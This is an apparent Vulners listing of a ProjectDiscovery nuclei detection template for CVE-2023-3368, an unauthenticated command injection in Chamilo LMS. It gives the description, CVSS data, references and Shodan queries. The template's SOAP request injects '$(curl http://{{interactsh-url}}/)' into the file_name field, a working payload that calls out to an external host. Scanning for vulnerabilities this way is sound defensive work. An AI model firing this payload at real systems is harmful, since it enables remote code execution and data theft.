Lucene search
K

Chamilo LMS <= v1.11.20 Unauthenticated Command Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 336 Views

Chamilo LMS v1.11.20 Command Injection allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special character

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-3368
17 Dec 202314:43
circl
CNNVD
Chamilo LMS Security Vulnerability
28 Nov 202300:00
cnnvd
CVE
CVE-2023-3368
28 Nov 202307:05
cve
Cvelist
CVE-2023-3368 Chamilo LMS Unauthenticated Command Injection
28 Nov 202307:05
cvelist
NVD
CVE-2023-3368
28 Nov 202307:15
nvd
OpenVAS
Chamilo LMS 1.11.x < 1.11.22 Multiple Vulnerabilities
1 Dec 202300:00
openvas
OSV
CVE-2023-3368
28 Nov 202307:15
osv
Prion
Command injection
28 Nov 202307:15
prion
Positive Technologies
PT-2023-24446 · Unknown · Chamilo Lms
28 Nov 202300:00
ptsecurity
RedhatCVE
CVE-2023-3368
23 May 202503:53
redhatcve
Rows per page
id: CVE-2023-3368

info:
  name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: |
    Command injection in `/main/webservices/additional_webservices.php`
    in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
    remote code execution via improper neutralisation of special characters.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands through the wsConvertPpt SOAP endpoint by injecting special characters in the file_name parameter, potentially compromising the entire Chamilo LMS platform and accessing student data.
  remediation: |
    Update Chamilo LMS to a version newer than 1.11.20 that properly neutralizes special characters and validates input in additional_webservices.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3368
    - https://starlabs.sg/advisories/23/23-3368/
    - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
    - https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
    - https://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3368
    cwe-id: CWE-78
    epss-score: 0.68897
    epss-percentile: 0.99263
    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: chamilo
    product: chamilo
    shodan-query:
      - http.component:"Chamilo"
      - http.component:"chamilo"
      - cpe:"cpe:2.3:a:chamilo:chamilo"
  tags: cve2023,cve,chamilo,unauth,cmd,rce,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/main/webservices/additional_webservices.php"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">720x540</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "wsConvertPptResponse"
        part: body

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022031fdee831e1a7a531db1508b21fe3f7c483523659a68812475ae4a2d8708d6db022100b39ef1fbf03f2f7c58c606ace5953c31317e6f7cd5fa347c5bab968a02c0b364:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
EPSS0.68897
SSVC
336